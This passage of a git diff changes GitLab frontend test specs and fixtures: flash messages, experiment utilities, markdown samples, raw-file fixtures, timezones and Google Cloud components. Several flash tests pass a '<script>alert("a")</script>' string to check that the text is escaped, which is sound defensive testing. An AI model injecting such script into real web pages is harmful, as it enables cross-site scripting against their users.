describe('experiment Utilities', () => { expect(experimentUtils.getExperimentData(...input)).toEqual(output); }); }); + + it('only collects the data properties which are supported by the schema', () => { + origGl = window.gl; + window.gl.experiments = { + my_experiment: { + experiment: 'my_experiment', + variant: 'control', + key: 'randomization-unit-key', + migration_keys: 'migration_keys object', + excluded: false, + other: 'foobar', + }, + }; + + expect(experimentUtils.getExperimentData('my_experiment')).toEqual({ + experiment: 'my_experiment', + variant: 'control', + key: 'randomization-unit-key', + migration_keys: 'migration_keys object', + }); + + window.gl = origGl; + }); }); describe('getAllExperimentContexts', () => { @@ -72,29 +95,17 @@ describe('experiment Utilities', () => { it('returns an empty array if there are no experiments', () => { expect(experimentUtils.getAllExperimentContexts()).toEqual([]); }); - - it('only collects the data properties which are supported by the schema', () => { - origGl = window.gl; - window.gl.experiments = { - my_experiment: { experiment: 'my_experiment', variant: 'control', excluded: false }, - }; - - expect(experimentUtils.getAllExperimentContexts()).toEqual([ - { schema, data: { experiment: 'my_experiment', variant: 'control' } }, - ]); - - window.gl = origGl; - }); }); describe('isExperimentVariant', () => { describe.each` - experiment | variant | input | output - ${ABC_KEY} | ${DEFAULT_VARIANT} | ${[ABC_KEY, DEFAULT_VARIANT]} | ${true} - ${ABC_KEY} | ${'_variant_name'} | ${[ABC_KEY, '_variant_name']} | ${true} - ${ABC_KEY} | ${'_variant_name'} | ${[ABC_KEY, '_bogus_name']} | ${false} - ${ABC_KEY} | ${'_variant_name'} | ${['boguskey', '_variant_name']} | ${false} - ${undefined} | ${undefined} | ${[ABC_KEY, '_variant_name']} | ${false} + experiment | variant | input | output + ${ABC_KEY} | ${CANDIDATE_VARIANT} | ${[ABC_KEY]} | ${true} + ${ABC_KEY} | ${DEFAULT_VARIANT} | ${[ABC_KEY, DEFAULT_VARIANT]} | ${true} + ${ABC_KEY} | ${'_variant_name'} | ${[ABC_KEY, '_variant_name']} | ${true} + ${ABC_KEY} | ${'_variant_name'} | ${[ABC_KEY, '_bogus_name']} | ${false} + ${ABC_KEY} | ${'_variant_name'} | ${['boguskey', '_variant_name']} | ${false} + ${undefined} | ${undefined} | ${[ABC_KEY, '_variant_name']} | ${false} `( 'with input=$input, experiment=$experiment, variant=$variant', ({ experiment, variant, input, output }) => { diff --git a/spec/frontend/fixtures/api_deploy_keys.rb b/spec/frontend/fixtures/api_deploy_keys.rb new file mode 100644 index 00000000000..7027b8c975b --- /dev/null +++ b/spec/frontend/fixtures/api_deploy_keys.rb @@ -0,0 +1,24 @@ +# frozen_string_literal: true + +require 'spec_helper' + +RSpec.describe API::DeployKeys, '(JavaScript fixtures)', type: :request do + include ApiHelpers + include JavaScriptFixturesHelpers + + let_it_be(:admin) { create(:admin) } + let_it_be(:project) { create(:project) } + let_it_be(:project2) { create(:project) } + let_it_be(:deploy_key) { create(:deploy_key, public: true) } + let_it_be(:deploy_key2) { create(:deploy_key, public: true) } + let_it_be(:deploy_keys_project) { create(:deploy_keys_project, :write_access, project: project, deploy_key: deploy_key) } + let_it_be(:deploy_keys_project2) { create(:deploy_keys_project, :write_access, project: project2, deploy_key: deploy_key) } + let_it_be(:deploy_keys_project3) { create(:deploy_keys_project, :write_access, project: project, deploy_key: deploy_key2) } + let_it_be(:deploy_keys_project4) { create(:deploy_keys_project, :write_access, project: project2, deploy_key: deploy_key2) } + + it 'api/deploy_keys/index.json' do + get api("/deploy_keys", admin) + + expect(response).to be_successful + end +end diff --git a/spec/frontend/fixtures/api_markdown.rb b/spec/frontend/fixtures/api_markdown.rb deleted file mode 100644 index 89f012a5110..00000000000 --- a/spec/frontend/fixtures/api_markdown.rb +++ /dev/null @@ -1,65 +0,0 @@ -# frozen_string_literal: true - -require 'spec_helper' - -RSpec.describe API::MergeRequests, '(JavaScript fixtures)', type: :request do - include ApiHelpers - include WikiHelpers - include JavaScriptFixturesHelpers - - let_it_be(:user) { create(:user, username: 'gitlab') } - - let_it_be(:group) { create(:group, :public) } - let_it_be(:project) { create(:project, :public, :repository, group: group) } - - let_it_be(:label) { create(:label, project: project, title: 'bug') } - let_it_be(:milestone) { create(:milestone, project: project, title: '1.1') } - let_it_be(:issue) { create(:issue, project: project) } - let_it_be(:merge_request) { create(:merge_request, source_project: project) } - - let_it_be(:project_wiki) { create(:project_wiki, project: project, user: user) } - - let(:project_wiki_page) { create(:wiki_page, wiki: project_wiki) } - - before(:all) do - group.add_owner(user) - project.add_maintainer(user) - end - - before do - sign_in(user) - end - - markdown_examples = begin - yaml_file_path = File.expand_path('api_markdown.yml', __dir__) - yaml = File.read(yaml_file_path) - YAML.safe_load(yaml, symbolize_names: true) - end - - markdown_examples.each do |markdown_example| - context = markdown_example.fetch(:context, '') - name = markdown_example.fetch(:name) - - context "for #{name}#{!context.empty? ? " (context: #{context})" : ''}" do - let(:markdown) { markdown_example.fetch(:markdown) } - - name = "#{context}_#{name}" unless context.empty? - - it "api/markdown/#{name}.json" do - api_url = case context - when 'project' - "/#{project.full_path}/preview_markdown" - when 'group' - "/groups/#{group.full_path}/preview_markdown" - when 'project_wiki' - "/#{project.full_path}/-/wikis/#{project_wiki_page.slug}/preview_markdown" - else - api "/markdown" - end - - post api_url, params: { text: markdown, gfm: true } - expect(response).to be_successful - end - end - end -end diff --git a/spec/frontend/fixtures/api_markdown.yml b/spec/frontend/fixtures/api_markdown.yml deleted file mode 100644 index 8fd6a5531db..00000000000 --- a/spec/frontend/fixtures/api_markdown.yml +++ /dev/null @@ -1,289 +0,0 @@ -# This data file drives the specs in -# spec/frontend/fixtures/api_markdown.rb and -# spec/frontend/content_editor/extensions/markdown_processing_spec.js ---- -- name: attachment_image - context: group - markdown: '![test-file](/uploads/aa45a38ec2cfe97433281b10bbff042c/test-file.png)' -- name: attachment_image - context: project - markdown: '![test-file](/uploads/aa45a38ec2cfe97433281b10bbff042c/test-file.png)' -- name: attachment_image - context: project_wiki - markdown: '![test-file](test-file.png)' -- name: attachment_link - context: group - markdown: '[test-file](/uploads/aa45a38ec2cfe97433281b10bbff042c/test-file.zip)' -- name: attachment_link - context: project - markdown: '[test-file](/uploads/aa45a38ec2cfe97433281b10bbff042c/test-file.zip)' -- name: attachment_link - context: project_wiki - markdown: '[test-file](test-file.zip)' -- name: audio - markdown: '![Sample Audio](https://gitlab.com/gitlab.mp3)' -- name: audio_and_video_in_lists - markdown: |- - * ![Sample Audio](https://gitlab.com/1.mp3) - * ![Sample Video](https://gitlab.com/2.mp4) - - 1. ![Sample Video](https://gitlab.com/1.mp4) - 2. ![Sample Audio](https://gitlab.com/2.mp3) - - * [x] ![Sample Audio](https://gitlab.com/1.mp3) - * [x] ![Sample Audio](https://gitlab.com/2.mp3) - * [x] ![Sample Video](https://gitlab.com/3.mp4) -- name: blockquote - markdown: |- - > This is a blockquote - > - > This is another one -- name: bold - markdown: '**bold**' -- name: bullet_list_style_1 - markdown: |- - * list item 1 - * list item 2 - * embedded list item 3 -- name: bullet_list_style_2 - markdown: |- - - list item 1 - - list item 2 - * embedded list item 3 -- name: bullet_list_style_3 - markdown: |- - + list item 1 - + list item 2 - - embedded list item 3 -- name: code_block - markdown: |- - ```javascript - console.log('hello world') - ``` -- name: color_chips - markdown: |- - - `#F00` - - `#F00A` - - `#FF0000` - - `#FF0000AA` - - `RGB(0,255,0)` - - `RGB(0%,100%,0%)` - - `RGBA(0,255,0,0.3)` - - `HSL(540,70%,50%)` - - `HSLA(540,70%,50%,0.3)` -- name: description_list - markdown: |- - <dl> - <dt>Frog</dt> - <dd>Wet green thing</dd> - <dt>Rabbit</dt> - <dd>Warm fluffy thing</dd> - <dt>Punt</dt> - <dd>Kick a ball</dd> - <dd>Take a bet</dd> - <dt>Color</dt> - <dt>Colour</dt> - <dd> - - Any hue except _white_ or **black** - - </dd> - </dl> -- name: details - markdown: |- - <details> - <summary>Apply this patch</summary> - - ```diff - diff --git a/spec/frontend/fixtures/api_markdown.yml b/spec/frontend/fixtures/api_markdown.yml - index 8433efaf00c..69b12c59d46 100644 - --- a/spec/frontend/fixtures/api_markdown.yml - +++ b/spec/frontend/fixtures/api_markdown.yml - @@ -33,6 +33,13 @@ - * <ruby>漢<rt>ㄏㄢˋ</rt></ruby> - * C<sub>7</sub>H<sub>16</sub> + O<sub>2</sub> → CO<sub>2</sub> + H<sub>2</sub>O - * The **Pythagorean theorem** is often expressed as <var>a<sup>2</sup></var> + <var>b<sup>2</sup></var> = <var>c<sup>2</sup></var>.The **Pythagorean theorem** is often expressed as <var>a<sup>2</sup></var> + <var>b<sup>2</sup></var> = <var>c<sup>2</sup></var> - +- name: details - + markdown: |- - + <details> - + <summary>Apply this patch</summary> - + - + 🐶 much meta, 🐶 many patch - + 🐶 such diff, 🐶 very meme - + 🐶 wow! - + </details> - - name: link - markdown: '[GitLab](https://gitlab.com)' - - name: attachment_link - ``` - - </details> -- name: div - markdown: |- - <div>plain text</div> - <div> - - just a plain ol' div, not much to _expect_! - - </div> -- name: emoji - markdown: ':sparkles: :heart: :100:' -- name: emphasis - markdown: '_emphasized text_' -- name: figure - markdown: |- - <figure> - - ![Elephant at sunset](elephant-sunset.jpg) - - <figcaption>An elephant at sunset</figcaption> - </figure> - <figure> - - ![A crocodile wearing crocs](croc-crocs.jpg) - - <figcaption> - - A crocodile wearing _crocs_! - - </figcaption> - </figure> -- name: frontmatter_json - markdown: |- - ;;; - { - "title": "Page title" - } - ;;; -- name: frontmatter_toml - markdown: |- - +++ - title = "Page title" - +++ -- name: frontmatter_yaml - markdown: |- - --- - title: Page title - --- -- name: hard_break - markdown: |- - This is a line after a\ - hard break -- name: headings - markdown: |- - # Heading 1 - - ## Heading 2 - - ### Heading 3 - - #### Heading 4 - - ##### Heading 5 - - ###### Heading 6 -- name: horizontal_rule - markdown: '---' -- name: html_marks - markdown: |- - * Content editor is ~~great~~<ins>amazing</ins>. - * If the changes <abbr title="Looks good to merge">LGTM</abbr>, please <abbr title="Merge when pipeline succeeds">MWPS</abbr>. - * The English song <q>Oh I do like to be beside the seaside</q> looks like this in Hebrew: <span dir="rtl">אה, אני אוהב להיות ליד חוף הים</span>. In the computer's memory, this is stored as <bdo dir="ltr">אה, אני אוהב להיות ליד חוף הים</bdo>. - * <cite>The Scream</cite> by Edvard Munch. Painted in 1893. - * <dfn>HTML</dfn> is the standard markup language for creating web pages. - * Do not forget to buy <mark>milk</mark> today. - * This is a paragraph and <small>smaller text goes here</small>. - * The concert starts at <time datetime="20:00">20:00</time> and you'll be able to enjoy the band for at least <time datetime="PT2H30M">2h 30m</time>. - * Press <kbd>Ctrl</kbd> + <kbd>C</kbd> to copy text (Windows). - * WWF's goal is to: <q>Build a future where people live in harmony with nature.</q> We hope they succeed. - * The error occured was: <samp>Keyboard not found. Press F1 to continue.</samp> - * The area of a triangle is: 1/2 x <var>b</var> x <var>h</var>, where <var>b</var> is the base, and <var>h</var> is the vertical height. - * <ruby>漢<rt>ㄏㄢˋ</rt></ruby> - * C<sub>7</sub>H<sub>16</sub> + O<sub>2</sub> → CO<sub>2</sub> + H<sub>2</sub>O - * The **Pythagorean theorem** is often expressed as <var>a<sup>2</sup></var> + <var>b<sup>2</sup></var> = <var>c<sup>2</sup></var> -- name: image - markdown: '![alt text](https://gitlab.com/logo.png)' -- name: inline_code - markdown: '`code`' -- name: inline_diff - markdown: |- - * {-deleted-} - * {+added+} -- name: link - markdown: '[GitLab](https://gitlab.com)' -- name: math - markdown: |- - This math is inline $`a^2+b^2=c^2`$. - - This is on a separate line: - - ```math - a^2+b^2=c^2 - ``` -- name: ordered_list - markdown: |- - 1. list item 1 - 2. list item 2 - 3. list item 3 -- name: ordered_list_with_start_order - markdown: |- - 134. list item 1 - 135. list item 2 - 136. list item 3 -- name: ordered_task_list - markdown: |- - 1. [x] hello - 2. [x] world - 3. [ ] example - 1. [ ] of nested - 1. [x] task list - 2. [ ] items -- name: ordered_task_list_with_order - markdown: |- - 4893. [x] hello - 4894. [x] world - 4895. [ ] example -- name: reference - context: project_wiki - markdown: |- - Hi @gitlab - thank you for reporting this ~bug (#1) we hope to fix it in %1.1 as part of !1 -- name: strike - markdown: '~~del~~' -- name: table - markdown: |- - | header | header | - |--------|--------| - | `code` | cell with **bold** | - | ~~strike~~ | cell with _italic_ | - - # content after table -- name: table_of_contents - markdown: |- - [[_TOC_]] - - # Lorem - - Well, that's just like... your opinion.. man. - - ## Ipsum - - ### Dolar - - # Sit amit - - ### I don't know -- name: task_list - markdown: |- - * [x] hello - * [x] world - * [ ] example - * [ ] of nested - * [x] task list - * [ ] items -- name: thematic_break - markdown: |- - --- -- name: video - markdown: '![Sample Video](https://gitlab.com/gitlab.mp4)' -- name: word_break - markdown: Fernstraßen<wbr>bau<wbr>privat<wbr>finanzierungs<wbr>gesetz diff --git a/spec/frontend/fixtures/blob.rb b/spec/frontend/fixtures/blob.rb index f90e3662e98..bfdeee0881b 100644 --- a/spec/frontend/fixtures/blob.rb +++ b/spec/frontend/fixtures/blob.rb @@ -34,7 +34,7 @@ RSpec.describe Projects::BlobController, '(JavaScript fixtures)', type: :control get(:show, params: { namespace_id: project.namespace, project_id: project, - id: 'master/README.md' + id: "#{project.default_branch}/README.md" }) expect(response).to be_successful diff --git a/spec/frontend/fixtures/projects.rb b/spec/frontend/fixtures/projects.rb index 23c18c97df2..3c8964d398a 100644 --- a/spec/frontend/fixtures/projects.rb +++ b/spec/frontend/fixtures/projects.rb @@ -65,31 +65,5 @@ RSpec.describe 'Projects (JavaScript fixtures)', type: :controller do expect_graphql_errors_to_be_empty end end - - context 'project storage count query' do - before do - project.statistics.update!( - repository_size: 3900000, - lfs_objects_size: 4800000, - build_artifacts_size: 400000, - pipeline_artifacts_size: 400000, - wiki_size: 300000, - packages_size: 3800000, - uploads_size: 900000 - ) - end - - base_input_path = 'projects/storage_counter/queries/' - base_output_path = 'graphql/projects/storage_counter/' - query_name = 'project_storage.query.graphql' - - it "#{base_output_path}#{query_name}.json" do - query = get_graphql_query_as_string("#{base_input_path}#{query_name}") - - post_graphql(query, current_user: user, variables: { fullPath: project.full_path }) - - expect_graphql_errors_to_be_empty - end - end end end diff --git a/spec/frontend/fixtures/raw.rb b/spec/frontend/fixtures/raw.rb index 211c4e7c048..b117cfea5fa 100644 --- a/spec/frontend/fixtures/raw.rb +++ b/spec/frontend/fixtures/raw.rb @@ -7,41 +7,45 @@ RSpec.describe 'Raw files', '(JavaScript fixtures)' do let(:namespace) { create(:namespace, name: 'frontend-fixtures' )} let(:project) { create(:project, :repository, namespace: namespace, path: 'raw-project') } - let(:response) { @blob.data.force_encoding('UTF-8') } + let(:response) { @response } + + def blob_at(commit, path) + @response = project.repository.blob_at(commit, path).data.force_encoding('UTF-8') + end after do remove_repository(project) end it 'blob/notebook/basic.json' do - @blob = project.repository.blob_at('6d85bb69', 'files/ipython/basic.ipynb') + blob_at('6d85bb69', 'files/ipython/basic.ipynb') end it 'blob/notebook/markdown-table.json' do - @blob = project.repository.blob_at('f6b7a707', 'files/ipython/markdown-table.ipynb') + blob_at('f6b7a707', 'files/ipython/markdown-table.ipynb') end it 'blob/notebook/worksheets.json' do - @blob = project.repository.blob_at('6d85bb69', 'files/ipython/worksheets.ipynb') + blob_at('6d85bb69', 'files/ipython/worksheets.ipynb') end it 'blob/notebook/math.json' do - @blob = project.repository.blob_at('93ee732', 'files/ipython/math.ipynb') + blob_at('93ee732', 'files/ipython/math.ipynb') end it 'blob/pdf/test.pdf' do - @blob = project.repository.blob_at('e774ebd33', 'files/pdf/test.pdf') + blob_at('e774ebd33', 'files/pdf/test.pdf') end it 'blob/text/README.md' do - @blob = project.repository.blob_at('e774ebd33', 'README.md') + blob_at('e774ebd33', 'README.md') end it 'blob/images/logo-white.png' do - @blob = project.repository.blob_at('e774ebd33', 'files/images/logo-white.png') + blob_at('e774ebd33', 'files/images/logo-white.png') end it 'blob/binary/Gemfile.zip' do - @blob = project.repository.blob_at('e774ebd33', 'Gemfile.zip') + blob_at('e774ebd33', 'Gemfile.zip') end end diff --git a/spec/frontend/fixtures/tabs.rb b/spec/frontend/fixtures/tabs.rb new file mode 100644 index 00000000000..697ff1c7c20 --- /dev/null +++ b/spec/frontend/fixtures/tabs.rb @@ -0,0 +1,26 @@ +# frozen_string_literal: true + +require 'spec_helper' + +RSpec.describe 'GlTabsBehavior', '(JavaScript fixtures)', type: :helper do + include JavaScriptFixturesHelpers + include TabHelper + + let(:response) { @tabs } + + it 'tabs/tabs.html' do + tabs = gl_tabs_nav({ data: { testid: 'tabs' } }) do + gl_tab_link_to('Foo', '#foo', item_active: true, data: { testid: 'foo-tab' }) + + gl_tab_link_to('Bar', '#bar', item_active: false, data: { testid: 'bar-tab' }) + + gl_tab_link_to('Qux', '#qux', item_active: false, data: { testid: 'qux-tab' }) + end + + panels = content_tag(:div, class: 'tab-content') do + content_tag(:div, 'Foo', { id: 'foo', class: 'tab-pane active', data: { testid: 'foo-panel' } }) + + content_tag(:div, 'Bar', { id: 'bar', class: 'tab-pane', data: { testid: 'bar-panel' } }) + + content_tag(:div, 'Qux', { id: 'qux', class: 'tab-pane', data: { testid: 'qux-panel' } }) + end + + @tabs = tabs + panels + end +end diff --git a/spec/frontend/fixtures/timezones.rb b/spec/frontend/fixtures/timezones.rb index 157f47855ea..2393f4e797d 100644 --- a/spec/frontend/fixtures/timezones.rb +++ b/spec/frontend/fixtures/timezones.rb @@ -8,11 +8,9 @@ RSpec.describe TimeZoneHelper, '(JavaScript fixtures)' do let(:response) { @timezones.sort_by! { |tz| tz[:name] }.to_json } - it 'timezones/short.json' do - @timezones = timezone_data(format: :short) - end - - it 'timezones/full.json' do - @timezones = timezone_data(format: :full) + %I[short abbr full].each do |format| + it "timezones/#{format}.json" do + @timezones = timezone_data(format: format) + end end end diff --git a/spec/frontend/flash_spec.js b/spec/frontend/flash_spec.js index f7bde8d2f16..fc736f2d155 100644 --- a/spec/frontend/flash_spec.js +++ b/spec/frontend/flash_spec.js @@ -1,38 +1,14 @@ +import * as Sentry from '@sentry/browser'; import createFlash, { - createFlashEl, - createAction, hideFlash, - removeFlashClickListener, + addDismissFlashClickListener, + FLASH_TYPES, FLASH_CLOSED_EVENT, } from '~/flash'; -describe('Flash', () => { - describe('createFlashEl', () => { - let el; - - beforeEach(() => { - el = document.createElement('div'); - }); - - afterEach(() => { - el.innerHTML = ''; - }); - - it('creates flash element with type', () => { - el.innerHTML = createFlashEl('testing', 'alert'); - - expect(el.querySelector('.flash-alert')).not.toBeNull(); - }); - - it('escapes text', () => { - el.innerHTML = createFlashEl('<script>alert("a");</script>', 'alert'); - - expect(el.querySelector('.flash-text').textContent.trim()).toBe( - '<script>alert("a");</script>', - ); - }); - }); +jest.mock('@sentry/browser'); +describe('Flash', () => { describe('hideFlash', () => { let el; @@ -92,59 +68,12 @@ describe('Flash', () => { }); }); - describe('createAction', () => { - let el; - - beforeEach(() => { - el = document.createElement('div'); - }); - - it('creates link with href', () => { - el.innerHTML = createAction({ - href: 'testing', - title: 'test', - }); - - expect(el.querySelector('.flash-action').href).toContain('testing'); - }); - - it('uses hash as href when no href is present', () => { - el.innerHTML = createAction({ - title: 'test', - }); - - expect(el.querySelector('.flash-action').href).toContain('#'); - }); - - it('adds role when no href is present', () => { - el.innerHTML = createAction({ - title: 'test', - }); - - expect(el.querySelector('.flash-action').getAttribute('role')).toBe('button'); - }); - - it('escapes the title text', () => { - el.innerHTML = createAction({ - title: '<script>alert("a")</script>', - }); - - expect(el.querySelector('.flash-action').textContent.trim()).toBe( - '<script>alert("a")</script>', - ); - }); - }); - describe('createFlash', () => { const message = 'test'; - const type = 'alert'; - const parent = document; const fadeTransition = false; const addBodyClass = true; const defaultParams = { message, - type, - parent, actionConfig: null, fadeTransition, addBodyClass, @@ -171,14 +100,28 @@ describe('Flash', () => { document.querySelector('.js-content-wrapper').remove(); }); - it('adds flash element into container', () => { + it('adds flash alert element into the document by default', () => { createFlash({ ...defaultParams }); - expect(document.querySelector('.flash-alert')).not.toBeNull(); + expect(document.querySelector('.flash-container .flash-alert')).not.toBeNull(); + expect(document.body.className).toContain('flash-shown'); + }); + + it('adds flash of a warning type', () => { + createFlash({ ...defaultParams, type: FLASH_TYPES.WARNING }); + expect(document.querySelector('.flash-container .flash-warning')).not.toBeNull(); expect(document.body.className).toContain('flash-shown'); }); + it('escapes text', () => { + createFlash({ ...defaultParams, message: '<script>alert("a");</script>' }); + + expect(document.querySelector('.flash-text').textContent.trim()).toBe( + '<script>alert("a");</script>', + ); + }); + it('adds flash into specified parent', () => { createFlash({ ...defaultParams, parent: document.querySelector('.content-wrapper') }); @@ -210,7 +153,26 @@ describe('Flash', () => { expect(document.body.className).not.toContain('flash-shown'); }); + it('does not capture error using Sentry', () => { + createFlash({ ...defaultParams, captureError: false, error: new Error('Error!') }); + + expect(Sentry.captureException).not.toHaveBeenCalled(); + }); + + it('captures error using Sentry', () => { + createFlash({ ...defaultParams, captureError: true, error: new Error('Error!') }); + + expect(Sentry.captureException).toHaveBeenCalledWith(expect.any(Error)); + expect(Sentry.captureException).toHaveBeenCalledWith( + expect.objectContaining({ + message: 'Error!', + }), + ); + }); + describe('with actionConfig', () => { + const findFlashAction = () => document.querySelector('.flash-container .flash-action'); + it('adds action link', () => { createFlash({ ...defaultParams, @@ -219,20 +181,69 @@ describe('Flash', () => { }, }); - expect(document.querySelector('.flash-action')).not.toBeNull(); + expect(findFlashAction()).not.toBeNull(); + }); + + it('creates link with href', () => { + createFlash({ + ...defaultParams, + actionConfig: { + href: 'testing', + title: 'test', + }, + }); + + expect(findFlashAction().href).toBe(`${window.location}testing`); + expect(findFlashAction().textContent.trim()).toBe('test'); + }); + + it('uses hash as href when no href is present', () => { + createFlash({ + ...defaultParams, + actionConfig: { + title: 'test', + }, + }); + + expect(findFlashAction().href).toBe(`${window.location}#`); + }); + + it('adds role when no href is present', () => { + createFlash({ + ...defaultParams, + actionConfig: { + title: 'test', + }, + }); + + expect(findFlashAction().getAttribute('role')).toBe('button'); + }); + + it('escapes the title text', () => { + createFlash({ + ...defaultParams, + actionConfig: { + title: '<script>alert("a")</script>', + }, + }); + + expect(findFlashAction().textContent.trim()).toBe('<script>alert("a")</script>'); }); it('calls actionConfig clickHandler on click', () => { - const actionConfig = { - title: 'test', - clickHandler: jest.fn(), - }; + const clickHandler = jest.fn(); - createFlash({ ...defaultParams, actionConfig }); + createFlash({ + ...defaultParams, + actionConfig: { + title: 'test', + clickHandler, + }, + }); - document.querySelector('.flash-action').click(); + findFlashAction().click(); - expect(actionConfig.clickHandler).toHaveBeenCalled(); + expect(clickHandler).toHaveBeenCalled(); }); }); @@ -252,7 +263,7 @@ describe('Flash', () => { }); }); - describe('removeFlashClickListener', () => { + describe('addDismissFlashClickListener', () => { let el; describe('with close icon', () => { @@ -268,7 +279,7 @@ describe('Flash', () => { }); it('removes global flash on click', (done) => { - removeFlashClickListener(el, false); + addDismissFlashClickListener(el, false); el.querySelector('.js-close-icon').click(); @@ -292,7 +303,7 @@ describe('Flash', () => { }); it('does not throw', () => { - expect(() => removeFlashClickListener(el, false)).not.toThrow(); + expect(() => addDismissFlashClickListener(el, false)).not.toThrow(); }); }); }); diff --git a/spec/frontend/gfm_auto_complete_spec.js b/spec/frontend/gfm_auto_complete_spec.js index 631e3307f7f..1ab3286fe4c 100644 --- a/spec/frontend/gfm_auto_complete_spec.js +++ b/spec/frontend/gfm_auto_complete_spec.js @@ -3,7 +3,7 @@ import MockAdapter from 'axios-mock-adapter'; import $ from 'jquery'; import labelsFixture from 'test_fixtures/autocomplete_sources/labels.json'; import GfmAutoComplete, { membersBeforeSave, highlighter } from 'ee_else_ce/gfm_auto_complete'; -import { initEmojiMock } from 'helpers/emoji'; +import { initEmojiMock, clearEmojiMock } from 'helpers/emoji'; import '~/lib/utils/jquery_at_who'; import { TEST_HOST } from 'helpers/test_constants'; import waitForPromises from 'helpers/wait_for_promises'; @@ -803,8 +803,6 @@ describe('GfmAutoComplete', () => { }); describe('emoji', () => { - let mock; - const mockItem = { 'atwho-at': ':', emoji: { @@ -818,14 +816,14 @@ describe('GfmAutoComplete', () => { }; beforeEach(async () => { - mock = await initEmojiMock(); + await initEmojiMock(); await new GfmAutoComplete({}).loadEmojiData({ atwho() {}, trigger() {} }, ':'); if (!GfmAutoComplete.glEmojiTag) throw new Error('emoji not loaded'); }); afterEach(() => { - mock.restore(); + clearEmojiMock(); }); describe('Emoji.templateFunction', () => { diff --git a/spec/frontend/google_cloud/components/app_spec.js b/spec/frontend/google_cloud/components/app_spec.js index bb86eb5c22e..570ac1e6ed1 100644 --- a/spec/frontend/google_cloud/components/app_spec.js +++ b/spec/frontend/google_cloud/components/app_spec.js @@ -1,65 +1,71 @@ import { shallowMount } from '@vue/test-utils'; -import { GlTab, GlTabs } from '@gitlab/ui'; +import { mapValues } from 'lodash'; import App from '~/google_cloud/components/app.vue'; +import Home from '~/google_cloud/components/home.vue'; import IncubationBanner from '~/google_cloud/components/incubation_banner.vue'; -import ServiceAccounts from '~/google_cloud/components/service_accounts.vue'; +import ServiceAccountsForm from '~/google_cloud/components/service_accounts_form.vue'; +import GcpError from '~/google_cloud/components/errors/gcp_error.vue'; +import NoGcpProjects from '~/google_cloud/components/errors/no_gcp_projects.vue'; + +const BASE_FEEDBACK_URL = + 'https://gitlab.com/gitlab-org/incubation-engineering/five-minute-production/meta/-/issues/new'; +const SCREEN_COMPONENTS = { + Home, + ServiceAccountsForm, + GcpError, + NoGcpProjects, +}; +const SERVICE_ACCOUNTS_FORM_PROPS = { + gcpProjects: [1, 2, 3], + environments: [4, 5, 6], + cancelPath: '', +}; +const HOME_PROPS = { + serviceAccounts: [{}, {}], + createServiceAccountUrl: '#url-create-service-account', + emptyIllustrationUrl: '#url-empty-illustration', +}; describe('google_cloud App component', () => { let wrapper; const findIncubationBanner = () => wrapper.findComponent(IncubationBanner); - const findTabs = () => wrapper.findComponent(GlTabs); - const findTabItems = () => findTabs().findAllComponents(GlTab); - const findConfigurationTab = () => findTabItems().at(0); - const findDeploymentTab = () => findTabItems().at(1); - const findServicesTab = () => findTabItems().at(2); - const findServiceAccounts = () => findConfigurationTab().findComponent(ServiceAccounts); - - beforeEach(() => { - const propsData = { - serviceAccounts: [{}, {}], - createServiceAccountUrl: '#url-create-service-account', - emptyIllustrationUrl: '#url-empty-illustration', - }; - wrapper = shallowMount(App, { propsData }); - }); afterEach(() => { wrapper.destroy(); }); - it('should contain incubation banner', () => { - expect(findIncubationBanner().exists()).toBe(true); - }); - - describe('google_cloud App tabs', () => { - it('should contain tabs', () => { - expect(findTabs().exists()).toBe(true); - }); + describe.each` + screen | extraProps | componentName + ${'gcp_error'} | ${{ error: 'mock_gcp_client_error' }} | ${'GcpError'} + ${'no_gcp_projects'} | ${{}} | ${'NoGcpProjects'} + ${'service_accounts_form'} | ${SERVICE_ACCOUNTS_FORM_PROPS} | ${'ServiceAccountsForm'} + ${'home'} | ${HOME_PROPS} | ${'Home'} + `('for screen=$screen', ({ screen, extraProps, componentName }) => { + const component = SCREEN_COMPONENTS[componentName]; - it('should contain three tab items', () => { - expect(findTabItems().length).toBe(3); + beforeEach(() => { + wrapper = shallowMount(App, { propsData: { screen, ...extraProps } }); }); - describe('configuration tab', () => { - it('should exist', () => { - expect(findConfigurationTab().exists()).toBe(true); - }); + it(`renders only ${componentName}`, () => { + const existences = mapValues(SCREEN_COMPONENTS, (x) => wrapper.findComponent(x).exists()); - it('should contain service accounts component', () => { - expect(findServiceAccounts().exists()).toBe(true); + expect(existences).toEqual({ + ...mapValues(SCREEN_COMPONENTS, () => false), + [componentName]: true, }); }); - describe('deployments tab', () => { - it('should exist', () => { - expect(findDeploymentTab().exists()).toBe(true); - }); + it(`renders the ${componentName} with props`, () => { + expect(wrapper.findComponent(component).props()).toEqual(extraProps); }); - describe('services tab', () => { - it('should exist', () => { - expect(findServicesTab().exists()).toBe(true); + it('renders incubation banner', () => { + expect(findIncubationBanner().props()).toEqual({ + shareFeedbackUrl: `${BASE_FEEDBACK_URL}?issuable_template=general_feedback`, + reportBugUrl: `${BASE_FEEDBACK_URL}?issuable_template=report_bug`, + featureRequestUrl: `${BASE_FEEDBACK_URL}?issuable_template=feature_request`, }); }); }); diff --git a/spec/frontend/google_cloud/components/errors/gcp_error_spec.js b/spec/frontend/google_cloud/components/errors/gcp_error_spec.js new file mode 100644 index 00000000000..4062a8b902a --- /dev/null +++ b/spec/frontend/google_cloud/components/errors/gcp_error_spec.js @@ -0,0 +1,34 @@ +import { shallowMount } from '@vue/test-utils'; +import { GlAlert } from '@gitlab/ui'; +import GcpError from '~/google_cloud/components/errors/gcp_error.vue'; + +describe('GcpError component', () => { + let wrapper; + + const findAlert = () => wrapper.findComponent(GlAlert); + const findBlockquote = () => wrapper.find('blockquote'); + + const propsData = { error: 'IAM and CloudResourceManager API disabled' }; + + beforeEach(() => { + wrapper = shallowMount(GcpError, { propsData }); + }); + + afterEach(() => { + wrapper.destroy(); + }); + + it('contains alert', () => { + expect(findAlert().exists()).toBe(true); + }); + + it('contains relevant text', () => { + const alertText = findAlert().text(); + expect(findAlert().props('title')).toBe(GcpError.i18n.title); + expect(alertText).toContain(GcpError.i18n.description); + }); + + it('contains error stacktrace', () => { + expect(findBlockquote().text()).toBe(propsData.error); + }); +}); diff --git a/spec/frontend/google_cloud/components/errors/no_gcp_projects_spec.js b/spec/frontend/google_cloud/components/errors/no_gcp_projects_spec.js new file mode 100644 index 00000000000..e1e20377880 --- /dev/null +++ b/spec/frontend/google_cloud/components/errors/no_gcp_projects_spec.js @@ -0,0 +1,33 @@ +import { mount } from '@vue/test-utils'; +import { GlAlert, GlButton } from '@gitlab/ui'; +import NoGcpProjects from '~/google_cloud/components/errors/no_gcp_projects.vue'; + 